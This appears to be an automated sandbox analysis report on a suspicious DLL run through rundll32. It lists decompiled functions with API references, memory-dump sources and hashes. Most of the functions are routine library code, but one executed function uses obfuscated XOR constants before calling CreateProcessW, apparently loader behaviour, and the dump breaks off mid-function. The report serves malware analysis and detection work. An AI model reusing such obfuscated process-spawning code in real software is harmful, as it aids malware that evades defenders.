					_t10 = GetTopWindow(_a4);
					while(1) {
						_t17 = _t10;
						__eflags = _t17;
						if(_t17 == 0) {
							goto L10;
						}
						_t10 = E10009844(_t13, _t14, _t17, _a8, _a12);
						__eflags = _t10;
						if(_t10 == 0) {
							_t10 = GetWindow(_t17, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t16) == 0) {
						L3:
						_push(_t16);
						if(_a12 == 0) {
							return E1000953E(_t13, _t14);
						}
						_t10 = E1000956A(_t14, _t15, _t16, __eflags);
						__eflags = _t10;
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E10009844(__ebx, _t14, _t16, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}

0x10009844
0x10009844
0x10009851
0x10009857
0x1000985d
0x10009861
0x10009891
0x10009894
0x100098b1
0x100098b1
0x100098b3
0x100098b5
0x00000000
0x00000000
0x1000989f
0x100098a4
0x100098a6
0x100098ab
0x00000000
0x100098ab
0x00000000
0x100098a6
0x10009863
0x10009868
0x1000987a
0x1000987e
0x1000987f
0x00000000
0x10009881
0x10009888
0x1000988d
0x1000988f
0x00000000
0x00000000
0x1000986a
0x10009871
0x10009878
0x00000000
0x00000000
0x10009878
0x10009868
0x100098ba
0x100098ba

APIs

GetDlgItem.USER32 ref: 10009851
GetTopWindow.USER32(00000000), ref: 10009864

Part of subcall function 10009844: GetWindow.USER32(00000000,00000002), ref: 100098AB

GetTopWindow.USER32(?), ref: 10009894

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: ac5db8f66474807e585e06eea04a53251a1441b917486411aae3d1504a1051ca
Instruction ID: 14020281eef5bd0ef36cce7b0195f1b05e7c8b64017ef2ceb9966d22978ff691
Opcode Fuzzy Hash: ac5db8f66474807e585e06eea04a53251a1441b917486411aae3d1504a1051ca
Instruction Fuzzy Hash: 6C016D3600176AB7FB22AF618C05E9F3B99EF836E0F56C020FD1895229DF31D91197A5

Uniqueness

Uniqueness Score: -1.00%

Function 1000D893, Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000D893() {
				intOrPtr _t16;
				struct HWND__* _t19;
				intOrPtr _t23;
				intOrPtr* _t28;
				void* _t29;

				_t28 =  *((intOrPtr*)(_t29 - 0x20));
				_t23 =  *((intOrPtr*)(_t29 - 0x24));
				if( *((intOrPtr*)(_t29 - 0x28)) != 0) {
					E1000C44D(_t23, 1);
				}
				if( *((intOrPtr*)(_t29 - 0x2c)) != 0) {
					EnableWindow( *(_t29 - 0x14), 1);
				}
				if( *(_t29 - 0x14) != 0) {
					_t19 = GetActiveWindow();
					_t34 = _t19 -  *((intOrPtr*)(_t28 + 0x20));
					if(_t19 ==  *((intOrPtr*)(_t28 + 0x20))) {
						SetActiveWindow( *(_t29 - 0x14));
					}
				}
				 *((intOrPtr*)( *_t28 + 0x60))();
				E1000D2E1(_t23, _t28, 0, _t28, _t34);
				if( *((intOrPtr*)(_t28 + 0x58)) != 0) {
					FreeResource( *(_t29 - 0x18));
				}
				_t16 =  *((intOrPtr*)(_t28 + 0x44));
				return E10013A50(_t16);
			}

0x1000d893
0x1000d896
0x1000d89e
0x1000d8a4
0x1000d8a4
0x1000d8ac
0x1000d8b3
0x1000d8b3
0x1000d8bc
0x1000d8be
0x1000d8c4
0x1000d8c7
0x1000d8cc
0x1000d8cc
0x1000d8c7
0x1000d8d6
0x1000d8db
0x1000d8e3
0x1000d8e8
0x1000d8e8
0x1000d8ee
0x1000d8f6

APIs

EnableWindow.USER32(?,00000001), ref: 1000D8B3
GetActiveWindow.USER32 ref: 1000D8BE
SetActiveWindow.USER32(?), ref: 1000D8CC
FreeResource.KERNEL32(?), ref: 1000D8E8

Part of subcall function 1000C44D: EnableWindow.USER32(?,?), ref: 1000C45E

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ActiveEnable$FreeResource
String ID:
API String ID: 253586258-0
Opcode ID: 0bda26084f0e8060fce56f1e5e934874b409c232c8c1f730120bf8cd11dcda4e
Instruction ID: fd6a9c38a923c87279ecd1f4cefe96c3cd03f1a881ca7116348629bdf0cf1b64
Opcode Fuzzy Hash: 0bda26084f0e8060fce56f1e5e934874b409c232c8c1f730120bf8cd11dcda4e
Instruction Fuzzy Hash: 92F0F934900618CFEF12FB64C8855ADB7F2FF48781B60442AF546721A5CB326D91CF65

Uniqueness

Uniqueness Score: -1.00%

Function 10018314, Relevance: 6.0, APIs: 4, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E10018314(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x1002e4a0);
				E10013B28(__ebx, __edi, __esi);
				_t28 = E10018651(__ebx, __edx, __edi, _t30);
				_t13 =  *0x100322e4; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E1001A8F1(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x100323c8; // 0x100322f0
					 *((intOrPtr*)(_t29 - 0x1c)) = E100182D6(_t8, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E1001837E();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E10018651(_t22, __edx, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E1001632B(_t25, _t26, 0x20);
				}
				return E10013B6D(_t28);
			}

0x10018314
0x10018314
0x10018314
0x10018314
0x10018314
0x10018316
0x1001831b
0x10018325
0x10018327
0x1001832f
0x10018353
0x10018355
0x1001835b
0x1001835f
0x10018362
0x1001836d
0x10018370
0x10018377
0x10018331
0x10018331
0x10018335
0x00000000
0x10018337
0x1001833c
0x1001833c
0x10018335
0x10018341
0x10018345
0x1001834a
0x10018352

APIs

__getptd.LIBCMT ref: 10018320

Part of subcall function 10018651: __getptd_noexit.LIBCMT ref: 10018654
Part of subcall function 10018651: __amsg_exit.LIBCMT ref: 10018661

__getptd.LIBCMT ref: 10018337
__amsg_exit.LIBCMT ref: 10018345
__lock.LIBCMT ref: 10018355

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 84562ce2a774ab64d0e0469838453cdf13786eda15b672104ce48a9547ca7aac
Instruction ID: 80f6a9f7c58138589fcfda093531dd4abeab72b754703e8259df23a4a134fee5
Opcode Fuzzy Hash: 84562ce2a774ab64d0e0469838453cdf13786eda15b672104ce48a9547ca7aac
Instruction Fuzzy Hash: AEF09036904714DFD721EBA4884274937E0EF00B60F558619E560AF292CB34FBC1CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1000E476, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E1000E476(void* __ecx) {
				signed int _v8;
				char _v20;
				char _v280;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				long _t12;
				intOrPtr _t13;
				intOrPtr _t19;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t29;
				signed int _t34;

				_t32 = _t34;
				_t9 =  *0x10031c30; // 0x1f496801
				_v8 = _t9 ^ _t34;
				_t12 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
				if(_t12 == 0) {
					L4:
					_t13 = 0;
					__eflags = 0;
				} else {
					_t38 = _t12 - 0x104;
					if(_t12 == 0x104) {
						goto L4;
					} else {
						 *(PathFindExtensionA( &_v280)) = 0;
						asm("movsd");
						asm("movsd");
						asm("movsb");
						_t13 = E1000E207(_t19,  &_v20, "%s%s.dll", _t38,  &_v20,  &_v280);
						_t25 = _t25;
					}
				}
				_pop(_t29);
				return E100127FF(_t13, _t19, _v8 ^ _t32, _t24, _t25, _t29);
			}

0x1000e479
0x1000e481
0x1000e488
0x1000e49e
0x1000e4a6
0x1000e4db
0x1000e4db
0x1000e4db
0x1000e4a8
0x1000e4a8
0x1000e4aa
0x00000000
0x1000e4ac
0x1000e4ba
0x1000e4c5
0x1000e4cc
0x1000e4d2
0x1000e4d3
0x1000e4d8
0x1000e4d8
0x1000e4aa
0x1000e4e2
0x1000e4e9

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 1000E49E
PathFindExtensionA.SHLWAPI(?), ref: 1000E4B4

Part of subcall function 1000E207: __EH_prolog3_GS.LIBCMT ref: 1000E211
Part of subcall function 1000E207: GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,1000E4D8,?,?), ref: 1000E241
Part of subcall function 1000E207: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 1000E255
Part of subcall function 1000E207: ConvertDefaultLocale.KERNEL32(?), ref: 1000E291
Part of subcall function 1000E207: ConvertDefaultLocale.KERNEL32(?), ref: 1000E29F
Part of subcall function 1000E207: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 1000E2BC
Part of subcall function 1000E207: ConvertDefaultLocale.KERNEL32(?), ref: 1000E2E7
Part of subcall function 1000E207: ConvertDefaultLocale.KERNEL32(000003FF), ref: 1000E2F0
Part of subcall function 1000E207: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 1000E3A5

Strings

%s%s.dll, xrefs: 1000E4BD

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
String ID: %s%s.dll
API String ID: 1311856149-1649984862
Opcode ID: f052346aee951cc47e290fbff10bf4ce0c939ffe28ead481c3eb5300903dd6cd
Instruction ID: 3ab29aa7df74c00520fbca61758eb00911f86ecadb3cc483c3d9bd3fa6e02e40
Opcode Fuzzy Hash: f052346aee951cc47e290fbff10bf4ce0c939ffe28ead481c3eb5300903dd6cd
Instruction Fuzzy Hash: 6101D172904168DBEB04DB28CD85AEF77FCEB48740F0104B5E911E7144EA30AE048BA0

Uniqueness

Uniqueness Score: -1.00%

Function 1001C5CC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E1001C5CC(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
				intOrPtr _t17;
				intOrPtr* _t28;
				void* _t29;

				_t30 = __eflags;
				_t28 = __esi;
				_t27 = __edi;
				_t26 = __edx;
				_t19 = __ebx;
				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
				E100138C6(__ebx, __edx, __edi, __esi, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
				 *((intOrPtr*)(E10018651(__ebx, __edx, __edi, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
				_t17 = E10018651(_t19, _t26, _t27, _t30);
				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
					_t17 =  *((intOrPtr*)(__esi + 0x14));
					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
								_t17 = E1001389F(_t37,  *((intOrPtr*)(_t28 + 0x18)));
								_t38 = _t17;
								if(_t17 != 0) {
									_push( *((intOrPtr*)(_t29 + 0x10)));
									_push(_t28);
									return E1001C364(_t38);
								}
							}
						}
					}
				}
				return _t17;
			}

0x1001c5cc
0x1001c5cc
0x1001c5cc
0x1001c5cc
0x1001c5cc
0x1001c5cf
0x1001c5d5
0x1001c5e3
0x1001c5e9
0x1001c5f1
0x1001c5fd
0x1001c605
0x1001c60d
0x1001c621
0x1001c623
0x1001c627
0x1001c62c
0x1001c632
0x1001c634
0x1001c636
0x1001c639
0x00000000
0x1001c640
0x1001c634
0x1001c627
0x1001c621
0x1001c60d
0x1001c641

APIs

Part of subcall function 100138C6: __getptd.LIBCMT ref: 100138CC
Part of subcall function 100138C6: __getptd.LIBCMT ref: 100138DC

__getptd.LIBCMT ref: 1001C5DB

Part of subcall function 10018651: __getptd_noexit.LIBCMT ref: 10018654
Part of subcall function 10018651: __amsg_exit.LIBCMT ref: 10018661

__getptd.LIBCMT ref: 1001C5E9

Strings

csm, xrefs: 1001C5F7

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 5572da55e2c1772c5548d220eeca1a34fe01079cb4f98469cd7b1e738ed63282
Instruction ID: bf39ac9e9cb10260a2828d29093a0553c2f720fb0057fd4d48923304c2c895dc
Opcode Fuzzy Hash: 5572da55e2c1772c5548d220eeca1a34fe01079cb4f98469cd7b1e738ed63282
Instruction Fuzzy Hash: 66016D38901309CBCF28CFA4C440A9CB3F5EF00251F14642DE4419E691CB30EAE0CF11

Uniqueness

Uniqueness Score: -1.00%

Function 1001DFA2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001DFA2(char _a4, char _a5, char _a6, char _a7) {
				char _t7;
				int _t10;

				_t7 = _a4;
				if(_t7 != 0) {
					_a4 = _t7 + 0x40;
					_a5 = 0x3a;
					_a6 = 0x5c;
					_a7 = 0;
					_t10 = GetDriveTypeA( &_a4);
					if(_t10 == 0 || _t10 == 1) {
						return 0;
					} else {
						goto L1;
					}
				} else {
					L1:
					return 1;
				}
			}

0x1001dfa7
0x1001dfac
0x1001dfb5
0x1001dfbc
0x1001dfc0
0x1001dfc4
0x1001dfc8
0x1001dfd0
0x1001dfda
0x00000000
0x00000000
0x00000000
0x1001dfae
0x1001dfae
0x1001dfb2
0x1001dfb2

APIs

GetDriveTypeA.KERNEL32(00000104,?,1001DFF2,00000104,00000000,00000007,00000007,?,1001E137,00000000,00000104,?,1002E7A8,0000000C,10015C59,00000104), ref: 1001DFC8

Strings

\, xrefs: 1001DFC0
:, xrefs: 1001DFBC

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: DriveType
String ID: :$\
API String ID: 338552980-1166558509
Opcode ID: 04592a71bae4b5137e018dc81b8b3e1434e64c4dd43cdb0c1687f3500b3cbaac
Instruction ID: 129bc1cebbd2c328060fb97fe51757ae7b4c1cd4a05a9a3fd7cf71849a5c1388
Opcode Fuzzy Hash: 04592a71bae4b5137e018dc81b8b3e1434e64c4dd43cdb0c1687f3500b3cbaac
Instruction Fuzzy Hash: 2FE012313582C959EB41EEA9844578A3FDCDB515D8F14806AE84DCE101E231D7968795

Uniqueness

Uniqueness Score: -1.00%

Function 1000FD0E, Relevance: 5.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000FD0E(signed int _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct _CRITICAL_SECTION* _t4;
				void* _t7;
				void* _t9;
				signed int _t10;
				void* _t13;
				intOrPtr* _t14;

				_t10 = _a4;
				_t15 = _t10 - 0x11;
				if(_t10 >= 0x11) {
					_t4 = E1000572D(_t7, _t9, _t10, _t13, _t15);
				}
				if( *0x100584ec == 0) {
					_t4 = E1000FCEA();
				}
				_t14 = 0x100586a0 + _t10 * 4;
				if( *_t14 == 0) {
					EnterCriticalSection(0x10058688);
					if( *_t14 == 0) {
						_t4 = 0x100584f0 + _t10 * 0x18;
						InitializeCriticalSection(_t4);
						 *_t14 =  *_t14 + 1;
					}
					LeaveCriticalSection(0x10058688);
				}
				EnterCriticalSection(0x100584f0 + _t10 * 0x18);
				return _t4;
			}

0x1000fd16
0x1000fd19
0x1000fd1c
0x1000fd1e
0x1000fd1e
0x1000fd2a
0x1000fd2c
0x1000fd2c
0x1000fd37
0x1000fd41
0x1000fd48
0x1000fd4d
0x1000fd54
0x1000fd5a
0x1000fd60
0x1000fd60
0x1000fd67
0x1000fd67
0x1000fd77
0x1000fd7d

APIs

EnterCriticalSection.KERNEL32(10058688,?,?,?,?,100107A4,00000010,00000008,10006E1A,10006DBD,10005749,100012B7,1F496801), ref: 1000FD48
InitializeCriticalSection.KERNEL32(?,?,?,?,?,100107A4,00000010,00000008,10006E1A,10006DBD,10005749,100012B7,1F496801), ref: 1000FD5A
LeaveCriticalSection.KERNEL32(10058688,?,?,?,?,100107A4,00000010,00000008,10006E1A,10006DBD,10005749,100012B7,1F496801), ref: 1000FD67
EnterCriticalSection.KERNEL32(?,?,?,?,?,100107A4,00000010,00000008,10006E1A,10006DBD,10005749,100012B7,1F496801), ref: 1000FD77

Part of subcall function 1000572D: __CxxThrowException@8.LIBCMT ref: 10005743
Part of subcall function 1000572D: __EH_prolog3.LIBCMT ref: 10005750

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
String ID:
API String ID: 2895727460-0
Opcode ID: a74f97c844807e669f7c3a0b51daeb75f27277a6a837ec78d93c8939710d7813
Instruction ID: 1fd1a0261c41d2b83af1093fb08cd4050a18ab6ecb8f8ebdc8e75f8b2ad75162
Opcode Fuzzy Hash: a74f97c844807e669f7c3a0b51daeb75f27277a6a837ec78d93c8939710d7813
Instruction Fuzzy Hash: F8F0F6725002179FF7108B58CC89B29B7AAFBD0395F52001AFD4462511CB349A468F66

Uniqueness

Uniqueness Score: -1.00%

Function 1001071D, Relevance: 5.0, APIs: 4, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001071D(long* __ecx, signed int _a4) {
				void* _t9;
				struct _CRITICAL_SECTION* _t12;
				signed int _t14;
				long* _t16;

				_t16 = __ecx;
				_t1 =  &(_t16[7]); // 0x1005875c
				_t12 = _t1;
				EnterCriticalSection(_t12);
				_t14 = _a4;
				if(_t14 <= 0) {
					L5:
					LeaveCriticalSection(_t12);
					return 0;
				}
				_t3 =  &(_t16[3]); // 0x3
				if(_t14 >=  *_t3) {
					goto L5;
				}
				_t9 = TlsGetValue( *_t16);
				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
					goto L5;
				} else {
					LeaveCriticalSection(_t12);
					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
				}
			}

0x10010724
0x10010727
0x10010727
0x1001072b
0x10010731
0x10010736
0x1001075f
0x10010760
0x00000000
0x10010766
0x10010738
0x1001073b
0x00000000
0x00000000
0x1001073f
0x10010747
0x00000000
0x1001074e
0x10010755
0x00000000
0x1001075b

APIs

EnterCriticalSection.KERNEL32(1005875C,?,?,?,?,10010BB0,?,00000004,10006DFB,10005749,100012B7,1F496801), ref: 1001072B
TlsGetValue.KERNEL32(10058740,?,?,?,?,10010BB0,?,00000004,10006DFB,10005749,100012B7,1F496801), ref: 1001073F
LeaveCriticalSection.KERNEL32(1005875C,?,?,?,?,10010BB0,?,00000004,10006DFB,10005749,100012B7,1F496801), ref: 10010755
LeaveCriticalSection.KERNEL32(1005875C,?,?,?,?,10010BB0,?,00000004,10006DFB,10005749,100012B7,1F496801), ref: 10010760

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: fafcf9c684e30789af7ba25db9ee073830d48d6cb5bedfa93dcf31d08710e8f3
Instruction ID: eed599ebd94acd32f4b89867385f0dfcabb83a4414c15bdda93faf52650b8c8b
Opcode Fuzzy Hash: fafcf9c684e30789af7ba25db9ee073830d48d6cb5bedfa93dcf31d08710e8f3
Instruction Fuzzy Hash: 4EF054763046149FE710DF58CCC8C4677E9FF842613264855F8499B552DB70F855CF51

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 4624 Parent PID: 1536 rundll32.exeCOMMON

Executed Functions

Function 0463BA2C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65
processCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E0463BA2C(void* __ecx, void* __edx, struct _PROCESS_INFORMATION* _a4, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, WCHAR* _a36, intOrPtr _a40, int _a44, intOrPtr _a56, struct _STARTUPINFOW* _a60, intOrPtr _a68) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t45;
				int _t52;

				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(0);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				_push(__ecx);
				E0462DD01(_t45);
				_v20 = 0x4137cb;
				_v20 = _v20 >> 4;
				_v20 = _v20 ^ 0x000629e3;
				_v8 = 0xe23209;
				_v8 = _v8 | 0xb5cb40f7;
				_v8 = _v8 + 0x67bb;
				_v8 = _v8 ^ 0xb5e315b2;
				_v16 = 0x232e3c;
				_v16 = _v16 | 0x47fb43a0;
				_v16 = _v16 ^ 0x47fac30a;
				_v12 = 0x992608;
				_v12 = _v12 << 6;
				_v12 = _v12 ^ 0x26445c1d;
				E0463CDA7(0x1ae, __ecx, 0xbd10ff8e, __ecx, 0x98a9b13a);
				_t52 = CreateProcessW(_a36, _a20, 0, 0, _a44, 0, 0, 0, _a60, _a4); // executed
				return _t52;
			}

0x0463ba33
0x0463ba38
0x0463ba39
0x0463ba3c
0x0463ba3f
0x0463ba40
0x0463ba41
0x0463ba44
0x0463ba47
0x0463ba4a
0x0463ba4d
0x0463ba50
0x0463ba53
0x0463ba56
0x0463ba59
0x0463ba5c
0x0463ba5d
0x0463ba60
0x0463ba61
0x0463ba62
0x0463ba67
0x0463ba71
0x0463ba75
0x0463ba7c
0x0463ba83
0x0463ba8a
0x0463ba91
0x0463ba98
0x0463ba9f
0x0463baa6
0x0463baad
0x0463bab4
0x0463bab8
0x0463badc
0x0463baf8
0x0463bafe

APIs

CreateProcessW.KERNELBASE(?,?,00000000,00000000,?,00000000,00000000,00000000,?,26445C1D), ref: 0463BAF8

Strings

2, xrefs: 0463BA7C
<.#, xrefs: 0463BA98

Memory Dump Source

Source File: 00000003.00000002.348521734.0000000004621000.00000020.00000001.sdmp, Offset: 04620000, based on PE: true

Associated: 00000003.00000002.348514487.0000000004620000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.348544649.0000000004645000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.348550176.0000000004647000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateProcess
String ID: 2$<.#
API String ID: 963392458-3491762637
Opcode ID: 3c2a5807b2f49b0e2827f103b7ab1b6f82503b6a15dab8673ed5ccabc0516bb4
Instruction ID: ff923b84c4f058823dc092b504d7a4d3ce698a89c2f4d5121f09889eef0d3328
Opcode Fuzzy Hash: 3c2a5807b2f49b0e2827f103b7ab1b6f82503b6a15dab8673ed5ccabc0516bb4
Instruction Fuzzy Hash: E821A07280122CBBDF169F95CD0ACDE7F76FF09394F058148FA1962120D3769A64EB90

Uniqueness

Uniqueness Score: -1.00%

Function 0462B92B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0462B92B() {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t49;

				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0x914a81;
				_v32 = 0x49100;
				_v16 = 0xbcde59;
				_v16 = _v16 ^ 0x3502d399;
				_v16 = _v16 * 0x19;
				_v16 = _v16 | 0x93204948;
				_v16 = _v16 ^ 0xbfa2cd8a;
				_v12 = 0xd6e69c;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 >> 7;
				_v12 = _v12 + 0xe46a;
				_v12 = _v12 ^ 0x00021647;
				_v20 = 0x6d6daa;
				_v20 = _v20 + 0xffff1abc;
				_v20 = _v20 ^ 0x00614392;
				_v8 = 0x85be29;
				_v8 = _v8 + 0xbebc;
